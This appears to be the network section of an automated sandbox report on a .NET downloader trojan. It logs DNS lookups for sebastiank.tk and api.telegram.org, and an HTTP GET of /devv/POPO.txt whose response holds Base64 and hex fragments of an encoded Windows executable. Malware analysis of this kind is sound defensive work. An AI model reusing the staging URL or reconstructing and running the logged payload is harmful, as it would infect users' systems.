                                                                        Aug 8, 2022 12:54:13.662794113 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662811995 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662847996 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.666491985 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.670591116 CEST49756443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.670666933 CEST44349756162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.670752048 CEST49756443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.671205997 CEST49756443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.671235085 CEST44349756162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:14.005908012 CEST44349756162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:14.014199972 CEST49756443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:14.014249086 CEST44349756162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:14.381628036 CEST44349756162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:14.381678104 CEST44349756162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:14.381762028 CEST49756443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:14.381798983 CEST44349756162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:14.549962997 CEST44349756162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:14.550071955 CEST44349756162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:14.550079107 CEST49756443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:14.550129890 CEST44349756162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:14.550141096 CEST49756443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:14.550179005 CEST49756443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:14.550184011 CEST44349756162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:14.550241947 CEST49756443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:14.551207066 CEST49756443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:56:03.096132040 CEST49855443192.168.2.4149.154.167.220
                                                                        Aug 8, 2022 12:56:03.096199989 CEST44349855149.154.167.220192.168.2.4
                                                                        Aug 8, 2022 12:56:03.096340895 CEST49855443192.168.2.4149.154.167.220
                                                                        Aug 8, 2022 12:56:03.186307907 CEST49855443192.168.2.4149.154.167.220
                                                                        Aug 8, 2022 12:56:03.186363935 CEST44349855149.154.167.220192.168.2.4
                                                                        Aug 8, 2022 12:56:03.258402109 CEST44349855149.154.167.220192.168.2.4
                                                                        Aug 8, 2022 12:56:03.258594036 CEST49855443192.168.2.4149.154.167.220
                                                                        Aug 8, 2022 12:56:03.261369944 CEST49855443192.168.2.4149.154.167.220
                                                                        Aug 8, 2022 12:56:03.261404037 CEST44349855149.154.167.220192.168.2.4
                                                                        Aug 8, 2022 12:56:03.261622906 CEST44349855149.154.167.220192.168.2.4
                                                                        Aug 8, 2022 12:56:03.310230017 CEST49855443192.168.2.4149.154.167.220
                                                                        Aug 8, 2022 12:56:04.519252062 CEST49855443192.168.2.4149.154.167.220
                                                                        Aug 8, 2022 12:56:04.546888113 CEST44349855149.154.167.220192.168.2.4
                                                                        Aug 8, 2022 12:56:04.548051119 CEST49855443192.168.2.4149.154.167.220
                                                                        Aug 8, 2022 12:56:04.591397047 CEST44349855149.154.167.220192.168.2.4
                                                                        Aug 8, 2022 12:56:04.941417933 CEST44349855149.154.167.220192.168.2.4
                                                                        Aug 8, 2022 12:56:04.941570997 CEST44349855149.154.167.220192.168.2.4
                                                                        Aug 8, 2022 12:56:04.941670895 CEST49855443192.168.2.4149.154.167.220
                                                                        Aug 8, 2022 12:56:04.943898916 CEST49855443192.168.2.4149.154.167.220
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Aug 8, 2022 12:54:11.254271030 CEST5480053192.168.2.48.8.8.8
                                                                        Aug 8, 2022 12:54:11.604284048 CEST53548008.8.8.8192.168.2.4
                                                                        Aug 8, 2022 12:56:03.035561085 CEST6149753192.168.2.48.8.8.8
                                                                        Aug 8, 2022 12:56:03.054502964 CEST53614978.8.8.8192.168.2.4
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Aug 8, 2022 12:54:11.254271030 CEST192.168.2.48.8.8.80xbfc9Standard query (0)sebastiank.tkA (IP address)IN (0x0001)
                                                                        Aug 8, 2022 12:56:03.035561085 CEST192.168.2.48.8.8.80x153aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Aug 8, 2022 12:54:11.604284048 CEST8.8.8.8192.168.2.40xbfc9No error (0)sebastiank.tk162.240.35.239A (IP address)IN (0x0001)
                                                                        Aug 8, 2022 12:56:03.054502964 CEST8.8.8.8192.168.2.40x153aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                        • sebastiank.tk
                                                                        • api.telegram.org
                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.449751162.240.35.239443C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2022-08-08 10:54:12 UTC0OUTGET /devv/POPO.txt HTTP/1.1
                                                                        Host: sebastiank.tk
                                                                        Connection: Keep-Alive
                                                                        2022-08-08 10:54:12 UTC0INHTTP/1.1 200 OK
                                                                        Date: Mon, 08 Aug 2022 10:54:11 GMT
                                                                        Server: Apache
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Last-Modified: Sun, 07 Aug 2022 21:41:15 GMT
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 295596
                                                                        Content-Type: text/plain
                                                                        2022-08-08 10:54:12 UTC0INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 43 64 38 35 6d 45 41 41 41 41 41 41 41 41 41 41 4f 41 41 41 67 45 4c 41 51 73 41 41 46 67 44 41 41 41 49 41 41 41 41 41 41 41 41 54 6e 63 44 41 41 41 67 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDACd85mEAAAAAAAAAAOAAAgELAQsAAFgDAAAIAAAAAAAATncDAAAgAAAAAAAAAABAAAAgAAAAAgA
                                                                        2022-08-08 10:54:12 UTC8INData Raw: 77 59 41 41 41 51 6f 45 67 41 41 42 69 59 6f 6b 41 41 41 43 6e 38 47 41 41 41 45 65 7a 73 41 41 41 54 61 62 43 4d 41 41 41 41 41 41 45 43 50 51 46 73 6f 6b 51 41 41 43 72 63 67 57 41 49 41 41 44 45 49 46 6f 41 48 41 41 41 45 4b 77 59 58 67 41 63 41 41 41 51 71 41 41 41 41 47 7a 41 46 41 46 6f 44 41 41 41 64 41 41 41 52 4b 43 34 43 41 41 59 4b 66 67 67 41 41 41 51 6f 4c 67 49 41 42 68 59 6f 4c 67 41 41 43 68 59 37 50 51 4d 41 41 43 68 64 41 41 41 4b 4b 47 4d 43 41 41 59 6f 4a 41 41 41 43 67 74 2b 43 41 41 41 42 41 77 57 44 51 67 53 41 79 69 53 41 41 41 4b 42 6e 34 49 41 41 41 45 4b 43 51 41 41 41 6f 4b 66 70 4d 41 41 41 71 41 43 41 41 41 42 4e 34 4b 43 53 77 47 43 43 69 55 41 41 41 4b 33 48 34 4f 41 41 41 45 46 6a 4d 38 42 79 67 78 41 41 41 4b 4c 42 67 5a
                                                                        Data Ascii: wYAAAQoEgAABiYokAAACn8GAAAEezsAAATabCMAAAAAAECPQFsokQAACrcgWAIAADEIFoAHAAAEKwYXgAcAAAQqAAAAGzAFAFoDAAAdAAARKC4CAAYKfggAAAQoLgIABhYoLgAAChY7PQMAAChdAAAKKGMCAAYoJAAACgt+CAAABAwWDQgSAyiSAAAKBn4IAAAEKCQAAAoKfpMAAAqACAAABN4KCSwGCCiUAAAK3H4OAAAEFjM8BygxAAAKLBgZ
                                                                        2022-08-08 10:54:12 UTC15INData Raw: 44 63 41 41 41 6f 54 4e 79 67 34 41 41 41 4b 33 67 41 52 43 43 67 45 41 51 41 47 62 38 59 41 41 41 72 65 44 79 55 6f 4e 77 41 41 43 68 4d 34 4b 44 67 41 41 41 72 65 41 42 45 49 4b 4f 30 41 41 41 5a 76 78 67 41 41 43 74 34 50 4a 53 67 33 41 41 41 4b 45 7a 6b 6f 4f 41 41 41 43 74 34 41 45 51 67 6f 7a 41 41 41 42 6d 2f 47 41 41 41 4b 33 67 38 6c 4b 44 63 41 41 41 6f 54 4f 69 67 34 41 41 41 4b 33 67 41 52 43 47 2f 4f 41 41 41 4b 46 6a 36 31 41 51 41 41 45 51 68 76 7a 77 41 41 43 68 4e 42 4f 49 73 42 41 41 41 53 51 53 6a 51 41 41 41 4b 45 7a 73 52 4f 32 38 70 41 67 41 47 44 42 45 37 62 79 63 43 41 41 59 54 43 52 45 37 62 79 4d 43 41 41 59 4b 45 54 74 76 4a 51 49 41 42 68 4d 47 45 51 6c 76 79 51 41 41 43 68 66 2b 41 67 68 76 79 51 41 41 43 68 66 2b 41 6d 41 47
                                                                        Data Ascii: DcAAAoTNyg4AAAK3gARCCgEAQAGb8YAAAreDyUoNwAAChM4KDgAAAreABEIKO0AAAZvxgAACt4PJSg3AAAKEzkoOAAACt4AEQgozAAABm/GAAAK3g8lKDcAAAoTOig4AAAK3gARCG/OAAAKFj61AQAAEQhvzwAAChNBOIsBAAASQSjQAAAKEzsRO28pAgAGDBE7bycCAAYTCRE7byMCAAYKETtvJQIABhMGEQlvyQAAChf+AghvyQAAChf+AmAG
                                                                        2022-08-08 10:54:12 UTC23INData Raw: 67 49 65 51 4f 73 41 41 41 42 2b 44 51 41 41 42 43 6a 76 41 67 41 47 4b 45 41 41 41 41 6f 7a 47 58 34 49 41 41 41 45 4b 50 41 43 41 41 59 6f 4a 41 41 41 43 6f 41 49 41 41 41 45 33 66 30 47 41 41 42 2b 43 41 41 41 42 43 67 75 41 67 41 47 46 69 67 75 41 41 41 4b 46 6a 75 6d 41 41 41 41 66 67 67 41 41 41 52 2b 43 41 41 41 42 47 2f 4a 41 41 41 4b 66 69 67 41 41 41 52 76 79 51 41 41 43 74 70 2b 4b 41 41 41 42 47 2f 4a 41 41 41 4b 62 2b 38 41 41 41 70 2b 4b 41 41 41 42 42 59 6f 4c 67 41 41 43 68 59 75 62 33 34 49 41 41 41 45 66 67 67 41 41 41 52 76 79 51 41 41 43 68 33 61 62 77 67 42 41 41 6f 4b 42 69 6a 78 41 67 41 47 46 69 67 75 41 41 41 4b 46 76 34 42 46 76 34 42 66 67 67 41 41 41 52 2b 43 41 41 41 42 47 2f 4a 41 41 41 4b 47 74 70 76 43 41 45 41 43 6e 34 59
                                                                        Data Ascii: gIeQOsAAAB+DQAABCjvAgAGKEAAAAozGX4IAAAEKPACAAYoJAAACoAIAAAE3f0GAAB+CAAABCguAgAGFiguAAAKFjumAAAAfggAAAR+CAAABG/JAAAKfigAAARvyQAACtp+KAAABG/JAAAKb+8AAAp+KAAABBYoLgAAChYub34IAAAEfggAAARvyQAACh3abwgBAAoKBijxAgAGFiguAAAKFv4BFv4BfggAAAR+CAAABG/JAAAKGtpvCAEACn4Y
                                                                        2022-08-08 10:54:13 UTC31INData Raw: 41 6f 6f 56 77 49 41 42 69 67 75 41 67 41 47 62 33 67 41 41 41 6f 54 46 77 6b 67 44 6f 41 41 41 45 44 41 41 41 41 41 48 78 43 4e 4b 77 41 41 41 52 4d 62 45 52 51 52 47 78 38 51 4b 43 41 42 41 41 6f 44 63 79 45 42 41 41 6f 54 47 52 45 5a 45 52 74 76 49 67 45 41 43 68 4d 63 45 52 4d 58 32 68 66 57 6a 53 73 41 41 41 45 54 48 52 45 55 45 52 49 52 45 39 6f 52 48 52 59 52 45 79 67 57 41 51 41 4b 45 52 78 7a 49 51 45 41 43 68 4d 61 45 52 6f 52 48 57 38 69 41 51 41 4b 45 78 34 66 51 49 30 72 41 41 41 42 45 78 67 52 46 42 38 51 45 52 67 57 45 52 69 4f 74 79 67 57 41 51 41 4b 45 52 67 6f 47 41 45 41 43 69 68 58 41 67 41 47 4b 43 34 43 41 41 5a 76 65 41 41 41 43 68 4d 66 45 52 34 6f 47 41 45 41 43 69 68 58 41 67 41 47 4b 43 34 43 41 41 5a 76 65 41 41 41 43 68 4d 67
                                                                        Data Ascii: AooVwIABiguAgAGb3gAAAoTFwkgDoAAAEDAAAAAHxCNKwAAARMbERQRGx8QKCABAAoDcyEBAAoTGREZERtvIgEAChMcERMX2hfWjSsAAAETHREUERIRE9oRHRYREygWAQAKERxzIQEAChMaERoRHW8iAQAKEx4fQI0rAAABExgRFB8QERgWERiOtygWAQAKERgoGAEACihXAgAGKC4CAAZveAAAChMfER4oGAEACihXAgAGKC4CAAZveAAAChMg
                                                                        2022-08-08 10:54:13 UTC39INData Raw: 41 41 4b 62 79 49 42 41 41 6f 54 42 6e 4d 6d 41 51 41 4b 45 77 55 52 42 52 45 47 62 79 63 42 41 41 6f 52 42 52 68 76 4b 51 45 41 43 68 45 46 47 47 38 71 41 51 41 4b 43 41 4e 76 6d 41 41 41 43 68 4d 45 45 51 56 76 59 77 45 41 43 68 4d 48 45 51 63 52 42 42 59 52 42 49 36 33 62 79 77 42 41 41 6f 4c 33 68 6f 52 42 57 39 6b 41 51 41 4b 43 57 39 6c 41 51 41 4b 33 4e 34 4b 43 53 77 47 43 57 39 58 41 41 41 4b 33 41 63 6f 64 67 41 41 43 69 6f 41 41 41 41 42 48 41 41 41 41 67 42 47 41 42 70 67 41 41 34 41 41 41 41 41 41 67 41 4f 41 47 4a 77 41 41 6f 41 41 41 41 41 47 7a 41 45 41 48 6f 41 41 41 42 4e 41 41 41 52 46 41 74 7a 59 51 45 41 43 67 78 7a 59 67 45 41 43 67 30 43 65 30 67 41 41 41 51 54 42 6e 4d 6d 41 51 41 4b 45 77 55 52 42 52 45 47 62 79 63 42 41 41 6f 52
                                                                        Data Ascii: AAKbyIBAAoTBnMmAQAKEwURBREGbycBAAoRBRhvKQEAChEFGG8qAQAKCANvmAAAChMEEQVvYwEAChMHEQcRBBYRBI63bywBAAoL3hoRBW9kAQAKCW9lAQAK3N4KCSwGCW9XAAAK3AcodgAACioAAAABHAAAAgBGABpgAA4AAAAAAgAOAGJwAAoAAAAAGzAEAHoAAABNAAARFAtzYQEACgxzYgEACg0Ce0gAAAQTBnMmAQAKEwURBREGbycBAAoR
                                                                        2022-08-08 10:54:13 UTC47INData Raw: 77 38 54 42 51 41 52 42 52 33 2b 41 53 77 46 46 67 30 65 45 77 55 41 45 51 55 66 44 66 34 42 4c 41 34 4a 45 51 53 4f 74 7a 38 2f 2f 2f 2f 2f 48 77 34 54 42 51 41 52 42 52 38 4c 2f 67 45 73 46 51 59 49 4b 47 73 44 41 41 59 6f 4a 41 41 41 43 6d 2f 4d 41 41 41 4b 48 77 77 54 42 51 41 52 42 52 6a 2b 41 53 77 4a 63 37 77 41 41 41 6f 4b 47 52 4d 46 41 42 45 46 46 76 34 42 4c 41 4d 58 45 77 55 41 45 51 55 66 45 50 34 42 4c 41 49 72 42 54 69 7a 2f 76 2f 2f 42 69 6f 41 45 7a 41 44 41 46 63 42 41 41 42 63 41 41 41 52 48 78 69 4e 4b 77 41 41 41 51 6f 47 46 69 44 68 41 41 41 41 6e 41 59 58 49 50 41 41 41 41 43 63 42 68 67 67 77 77 41 41 41 4a 77 47 47 53 44 53 41 41 41 41 6e 41 59 61 49 4b 55 41 41 41 43 63 42 68 73 67 74 41 41 41 41 4a 77 47 48 43 43 48 41 41 41 41
                                                                        Data Ascii: w8TBQARBR3+ASwFFg0eEwUAEQUfDf4BLA4JEQSOtz8/////Hw4TBQARBR8L/gEsFQYIKGsDAAYoJAAACm/MAAAKHwwTBQARBRj+ASwJc7wAAAoKGRMFABEFFv4BLAMXEwUAEQUfEP4BLAIrBTiz/v//BioAEzADAFcBAABcAAARHxiNKwAAAQoGFiDhAAAAnAYXIPAAAACcBhggwwAAAJwGGSDSAAAAnAYaIKUAAACcBhsgtAAAAJwGHCCHAAAA
                                                                        2022-08-08 10:54:13 UTC54INData Raw: 67 41 47 42 69 69 6f 41 77 41 47 62 79 6f 43 41 41 59 47 43 39 34 56 4a 53 67 33 41 41 41 4b 45 77 6c 7a 49 67 49 41 42 67 73 6f 4f 41 41 41 43 74 34 41 42 79 6f 42 45 41 41 41 41 41 41 47 41 50 50 35 41 42 55 61 41 41 41 42 47 7a 41 44 41 46 77 41 41 41 42 65 41 41 41 52 63 37 6f 41 41 41 6f 4b 42 6e 34 73 41 51 41 45 4b 42 63 43 41 41 59 6f 56 41 4d 41 42 69 67 59 41 67 41 47 62 38 59 41 41 41 72 65 44 69 55 6f 4e 77 41 41 43 67 77 6f 4f 41 41 41 43 74 34 41 42 6e 34 73 41 51 41 45 4b 42 63 43 41 41 59 6f 56 41 4d 41 42 69 67 5a 41 67 41 47 62 38 59 41 41 41 72 65 44 69 55 6f 4e 77 41 41 43 67 30 6f 4f 41 41 41 43 74 34 41 42 69 6f 42 48 41 41 41 41 41 41 47 41 42 77 69 41 41 34 61 41 41 41 42 41 41 41 77 41 42 78 4d 41 41 34 61 41 41 41 42 47 7a 41 44
                                                                        Data Ascii: gAGBiioAwAGbyoCAAYGC94VJSg3AAAKEwlzIgIABgsoOAAACt4AByoBEAAAAAAGAPP5ABUaAAABGzADAFwAAABeAAARc7oAAAoKBn4sAQAEKBcCAAYoVAMABigYAgAGb8YAAAreDiUoNwAACgwoOAAACt4ABn4sAQAEKBcCAAYoVAMABigZAgAGb8YAAAreDiUoNwAACg0oOAAACt4ABioBHAAAAAAGABwiAA4aAAABAAAwABxMAA4aAAABGzAD
                                                                        2022-08-08 10:54:13 UTC62INData Raw: 41 41 4b 4b 4e 6b 44 41 41 59 58 62 7a 30 41 41 41 6f 4d 43 47 2b 78 41 51 41 4b 44 51 6b 54 44 68 59 54 44 54 6a 43 41 41 41 41 45 51 34 52 44 5a 6f 54 42 58 34 38 41 41 41 4b 4b 4e 6f 44 41 41 59 52 42 53 67 6b 41 41 41 4b 46 32 38 39 41 41 41 4b 45 77 59 6f 46 41 45 41 43 68 45 47 4b 4e 73 44 41 41 5a 76 73 67 45 41 43 6e 51 53 41 41 41 62 62 78 63 42 41 41 6f 54 43 78 45 47 4b 4e 77 44 41 41 5a 76 73 67 45 41 43 6e 51 53 41 41 41 62 45 77 63 52 42 69 6a 64 41 77 41 47 62 37 49 42 41 41 70 30 45 67 41 41 47 78 4d 49 45 67 67 52 43 49 36 33 46 39 6f 6f 42 67 41 41 4b 78 45 48 45 51 67 6f 34 41 41 41 42 68 4d 4a 63 79 49 43 41 41 59 54 43 68 45 4b 45 51 55 6f 33 67 41 41 42 6d 38 6f 41 67 41 47 45 51 6f 52 43 32 38 6b 41 67 41 47 45 51 6f 52 43 57 38 6d
                                                                        Data Ascii: AAKKNkDAAYXbz0AAAoMCG+xAQAKDQkTDhYTDTjCAAAAEQ4RDZoTBX48AAAKKNoDAAYRBSgkAAAKF289AAAKEwYoFAEAChEGKNsDAAZvsgEACnQSAAAbbxcBAAoTCxEGKNwDAAZvsgEACnQSAAAbEwcRBijdAwAGb7IBAAp0EgAAGxMIEggRCI63F9ooBgAAKxEHEQgo4AAABhMJcyICAAYTChEKEQUo3gAABm8oAgAGEQoRC28kAgAGEQoRCW8m
                                                                        2022-08-08 10:54:13 UTC70INData Raw: 67 45 57 2f 67 45 52 42 57 38 6c 41 67 41 47 4b 43 34 43 41 41 59 57 4b 43 34 41 41 41 6f 57 2f 67 45 57 2f 67 46 66 4c 41 67 47 45 51 56 76 45 67 45 41 43 68 49 4a 4b 4c 77 42 41 41 6f 36 45 76 37 2f 2f 39 34 63 45 67 6e 2b 46 68 6f 41 41 42 74 76 56 77 41 41 43 74 7a 65 44 43 67 33 41 41 41 4b 4b 44 67 41 41 41 72 65 41 41 59 71 41 45 46 4d 41 41 41 43 41 41 41 41 63 51 41 41 41 49 6b 42 41 41 44 36 41 51 41 41 44 67 41 41 41 41 41 41 41 41 41 43 41 41 41 41 54 77 41 41 41 41 49 43 41 41 42 52 41 67 41 41 44 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 54 77 41 41 41 42 49 43 41 41 42 68 41 67 41 41 44 41 41 41 41 42 6f 41 41 41 45 62 4d 41 77 41 6a 67 45 41 41 48 30 41 41 42 45 43 43 77 49 6f 4b 41 51 41 42 6d 2b 64 41 41 41 4b 4c 52 45 6f 4b 41 51 41
                                                                        Data Ascii: gEW/gERBW8lAgAGKC4CAAYWKC4AAAoW/gEW/gFfLAgGEQVvEgEAChIJKLwBAAo6Ev7//94cEgn+FhoAABtvVwAACtzeDCg3AAAKKDgAAAreAAYqAEFMAAACAAAAcQAAAIkBAAD6AQAADgAAAAAAAAACAAAATwAAAAICAABRAgAADgAAAAAAAAAAAAAATwAAABICAABhAgAADAAAABoAAAEbMAwAjgEAAH0AABECCwIoKAQABm+dAAAKLREoKAQA
                                                                        2022-08-08 10:54:13 UTC78INData Raw: 41 41 47 62 37 49 42 41 41 6f 6f 45 51 41 41 43 68 4d 49 45 51 68 76 63 77 45 41 43 74 41 56 41 41 41 42 4b 42 51 41 41 41 6f 7a 45 78 45 4b 45 51 67 6f 6e 41 41 41 43 6d 38 6b 41 67 41 47 4f 4c 6f 41 41 41 41 52 42 68 51 6f 68 41 49 41 42 68 65 4e 42 77 41 41 41 52 4d 57 45 52 59 57 45 51 67 6f 45 51 41 41 43 71 49 52 46 68 4d 58 45 52 63 55 46 42 65 4e 4c 77 41 41 41 52 4d 59 45 52 67 57 46 35 77 52 47 43 69 6a 41 41 41 4b 45 52 67 57 6b 43 77 4c 45 52 63 57 6d 69 67 52 41 41 41 4b 45 77 68 30 45 67 41 41 47 78 4d 4c 45 51 6f 52 42 68 45 4c 62 78 63 42 41 41 70 76 48 67 45 41 43 68 59 6f 37 67 45 41 43 69 6a 55 41 51 41 4b 4b 43 34 43 41 41 5a 76 65 41 41 41 43 6d 38 6b 41 67 41 47 33 6a 38 6f 4e 77 41 41 43 68 45 49 64 42 49 41 41 42 73 54 43 78 45 4b
                                                                        Data Ascii: AAGb7IBAAooEQAAChMIEQhvcwEACtAVAAABKBQAAAozExEKEQgonAAACm8kAgAGOLoAAAARBhQohAIABheNBwAAARMWERYWEQgoEQAACqIRFhMXERcUFBeNLwAAARMYERgWF5wRGCijAAAKERgWkCwLERcWmigRAAAKEwh0EgAAGxMLEQoRBhELbxcBAApvHgEAChYo7gEACijUAQAKKC4CAAZveAAACm8kAgAG3j8oNwAAChEIdBIAABsTCxEK
                                                                        2022-08-08 10:54:13 UTC86INData Raw: 68 4d 49 45 51 67 6f 6e 41 41 41 43 69 69 50 41 51 41 4b 4c 57 56 7a 49 67 49 41 42 68 4d 4a 45 51 6b 49 45 51 52 76 41 41 49 41 43 6e 73 44 41 67 41 4b 62 79 6f 43 41 41 59 52 43 52 45 49 46 43 69 4c 42 41 41 47 46 6f 30 48 41 41 41 42 46 42 51 55 4b 4b 4d 41 41 41 6f 6f 6e 41 41 41 43 6d 38 6d 41 67 41 47 45 51 6b 49 45 51 52 76 41 41 49 41 43 6e 73 43 41 67 41 4b 62 79 67 43 41 41 59 52 43 53 67 75 41 67 41 47 62 79 51 43 41 41 59 47 45 51 6c 76 45 67 45 41 43 74 34 4d 4b 44 63 41 41 41 6f 6f 4f 41 41 41 43 74 34 41 45 51 51 58 31 68 4d 45 45 51 51 52 45 6a 37 51 2f 76 2f 2f 63 2f 73 42 41 41 6f 4e 43 53 69 4d 42 41 41 47 4b 49 30 45 41 41 59 6f 49 77 41 41 43 69 69 4f 42 41 41 47 4b 43 51 41 41 41 6f 6f 6a 77 51 41 42 6e 50 38 41 51 41 4b 62 2f 30 42
                                                                        Data Ascii: hMIEQgonAAACiiPAQAKLWVzIgIABhMJEQkIEQRvAAIACnsDAgAKbyoCAAYRCREIFCiLBAAGFo0HAAABFBQUKKMAAAoonAAACm8mAgAGEQkIEQRvAAIACnsCAgAKbygCAAYRCSguAgAGbyQCAAYGEQlvEgEACt4MKDcAAAooOAAACt4AEQQX1hMEEQQREj7Q/v//c/sBAAoNCSiMBAAGKI0EAAYoIwAACiiOBAAGKCQAAAoojwQABnP8AQAKb/0B
                                                                        2022-08-08 10:54:13 UTC94INData Raw: 67 45 41 43 74 34 56 4a 53 67 33 41 41 41 4b 45 77 78 7a 75 67 41 41 43 67 73 6f 4f 41 41 41 43 74 34 43 42 69 6f 48 4b 67 41 41 41 52 41 41 41 41 41 41 4d 41 44 68 45 51 45 56 47 67 41 41 41 52 73 77 42 41 41 75 41 41 41 41 49 41 41 41 45 53 69 58 41 41 41 4b 41 69 68 6d 41 51 41 4b 46 42 63 6f 6b 67 45 41 43 6d 38 58 41 51 41 4b 43 74 34 53 4b 44 63 41 41 41 6f 6f 4c 67 49 41 42 67 6f 6f 4f 41 41 41 43 74 34 41 42 69 6f 41 41 41 45 51 41 41 41 41 41 41 41 41 47 68 6f 41 45 68 6f 41 41 41 45 62 4d 41 51 41 49 77 41 41 41 43 41 41 41 42 45 6f 6c 77 41 41 43 67 49 55 46 69 69 53 41 51 41 4b 62 78 63 42 41 41 6f 4b 33 67 77 6f 4e 77 41 41 43 69 67 34 41 41 41 4b 33 67 41 47 4b 67 41 42 45 41 41 41 41 41 41 41 41 42 55 56 41 41 77 61 41 41 41 42 48 67 49 6f
                                                                        Data Ascii: gEACt4VJSg3AAAKEwxzugAACgsoOAAACt4CBioHKgAAARAAAAAAMADhEQEVGgAAARswBAAuAAAAIAAAESiXAAAKAihmAQAKFBcokgEACm8XAQAKCt4SKDcAAAooLgIABgooOAAACt4ABioAAAEQAAAAAAAAGhoAEhoAAAEbMAQAIwAAACAAABEolwAACgIUFiiSAQAKbxcBAAoK3gwoNwAACig4AAAK3gAGKgABEAAAAAAAABUVAAwaAAABHgIo
                                                                        2022-08-08 10:54:13 UTC101INData Raw: 78 67 54 42 41 41 52 42 42 6e 2b 41 53 77 51 41 68 64 76 4e 41 49 41 43 69 67 31 41 67 41 4b 43 78 6f 54 42 41 41 52 42 42 6a 2b 41 53 77 51 41 68 5a 76 4e 41 49 41 43 69 67 31 41 67 41 4b 43 68 6b 54 42 41 41 52 42 42 72 2b 41 53 77 62 49 50 38 41 41 41 41 47 47 6d 49 48 31 69 43 6a 41 41 41 41 59 53 44 2f 41 41 41 41 58 32 45 4e 47 78 4d 45 41 42 45 45 46 76 34 42 4c 41 4d 58 45 77 51 41 45 51 51 62 2f 67 45 73 41 69 73 43 4b 34 73 4a 4b 67 41 62 4d 41 4d 41 36 77 49 41 41 4b 38 41 41 42 45 43 66 70 4d 41 41 41 6f 57 4b 43 34 41 41 41 6f 57 4c 69 41 44 66 70 4d 41 41 41 6f 57 4b 43 34 41 41 41 6f 57 4d 77 49 72 44 77 52 2b 6b 77 41 41 43 68 59 6f 4c 67 41 41 43 68 59 7a 43 79 67 75 41 67 41 47 43 74 32 76 41 67 41 41 41 78 4d 48 63 37 77 41 41 41 6f 4c
                                                                        Data Ascii: xgTBAARBBn+ASwQAhdvNAIACig1AgAKCxoTBAARBBj+ASwQAhZvNAIACig1AgAKChkTBAARBBr+ASwbIP8AAAAGGmIH1iCjAAAAYSD/AAAAX2ENGxMEABEEFv4BLAMXEwQAEQQb/gEsAisCK4sJKgAbMAMA6wIAAK8AABECfpMAAAoWKC4AAAoWLiADfpMAAAoWKC4AAAoWMwIrDwR+kwAAChYoLgAAChYzCyguAgAGCt2vAgAAAxMHc7wAAAoL
